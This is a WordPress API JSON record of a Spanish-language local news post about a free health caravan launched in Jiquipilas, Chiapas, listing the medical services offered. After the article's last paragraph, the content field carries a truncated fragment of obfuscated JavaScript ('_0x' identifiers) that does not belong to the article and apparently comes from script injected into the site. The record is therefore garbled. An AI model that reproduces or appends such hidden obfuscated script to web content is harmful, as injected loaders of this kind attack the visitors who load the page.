{"id":7108,"date":"2022-12-01T03:34:42","date_gmt":"2022-12-01T03:34:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7108"},"modified":"2022-12-01T03:34:42","modified_gmt":"2022-12-01T03:34:42","slug":"arranco-en-jiquipilas-la-caravana-de-salud","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7108","title":{"rendered":"Arranc\u00f3 en Jiquipilas la Caravana de Salud"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0022-1024x576.jpg\" alt=\"\" class=\"wp-image-7109\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0022-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0022-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0022-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0022-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0022.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u2022 El Presidente Municipal Hugo L\u00e1zaro reconoci\u00f3 al Gobernador Rutilio Escand\u00f3n y al Secretario de Salud Jos\u00e9 Manuel Cruz por emprender estas acciones.<\/p>\n\n\n\n<p>\u2022 La campa\u00f1a gratuita es del 30 de noviembre al 4 de diciembre.<\/p>\n\n\n\n<p>Jiquipilas, Chiapas. \u2013 Hoy inici\u00f3 la Caravana de Salud que beneficiar\u00e1 durante cinco d\u00edas con servicios m\u00e9dicos a toda la poblaci\u00f3n de bajos recursos econ\u00f3micos, gracias a las acciones emprendidas por el Gobernador Rutilio Escand\u00f3n Cadenas, se\u00f1al\u00f3 el Alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez.<\/p>\n\n\n\n<p>Destac\u00f3 la importancia de que el programa contin\u00fae impuls\u00e1ndose en los municipios, tal y como lo ha llevado a cabo el Secretario de Salud Jos\u00e9 Manuel Cruz Castellanos a quien reconoci\u00f3 su inter\u00e9s por la salud de los chiapanecos.<\/p>\n\n\n\n<p>En este sentido, Hugo L\u00e1zaro agradeci\u00f3 a las autoridades estatales por el atinado programa, ya que en Jiquipilas cientos de personas siguen siendo beneficiadas con las caravanas de la salud.<\/p>\n\n\n\n<p>\u201cLa salud p\u00fablica es uno de nuestros principales ejes de gobierno municipal, por ello, estamos muy comprometidos y coordinando esfuerzos con las instancias, porque sabemos que el beneficio es para la gente de bajos recursos econ\u00f3micos\u201d, refiri\u00f3 el Edil jiquipilteco.<\/p>\n\n\n\n<p>La Caravana de Salud concluir\u00e1 el pr\u00f3ximo domingo 4 de diciembre y se estar\u00e1n otorgando gratuitamente servicios de: Consulta M\u00e9dica General, Laboratorio Cl\u00ednico, Densitometr\u00eda Calc\u00e1nea (a partir de los 40 a\u00f1os), Electrocardiograma, Ultrasonido P\u00e9lvico, Ultrasonido Obst\u00e9trico, Rayos X de T\u00f3rax y Mastograf\u00eda.<\/p>\n\n\n\n<p>Tras la inauguraci\u00f3n, el Presidente Municipal Hugo L\u00e1zaro exhort\u00f3 a toda la poblaci\u00f3n a que se acerquen a los m\u00f3dulos de servicios m\u00e9dicos para que reciban informaci\u00f3n y atenci\u00f3n de salud gratuita y de calidad.<\/p>\n\n\n\n<p>Acompa\u00f1aron al Mun\u00edcipe en este acto Jaime P\u00e9rez Morales en representaci\u00f3n del titular de salud estatal Jos\u00e9 Manuel Cruz Castellanos, Deysi Rodas de la Cruz responsable de la caravana de salud Chiapas de coraz\u00f3n, en representaci\u00f3n del coordinador Fabi\u00e1n Cruz Melchor.<\/p>\n\n\n\n<p>As\u00ed como Yochira Rodr\u00edguez Alvarado coordinadora del Centro de Salud Jiquipilas, Porfirio Gil Gonz\u00e1lez Regidor del ayuntamiento, entre otras personalidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El Presidente Municipal Hugo L\u00e1zaro reconoci\u00f3 al Gobernador Rutilio Escand\u00f3n y al Secretario de Salud Jos\u00e9 Manuel Cruz por emprender estas acciones. \u2022 La campa\u00f1a gratuita es del 30 de noviembre al 4 de diciembre. Jiquipilas, Chiapas. \u2013 Hoy inici\u00f3 la Caravana de Salud que beneficiar\u00e1 durante cinco d\u00edas con servicios m\u00e9dicos a toda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7109,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7108","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7108"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7108\/revisions"}],"predecessor-version":[{"id":7110,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7108\/revisions\/7110"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7109"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}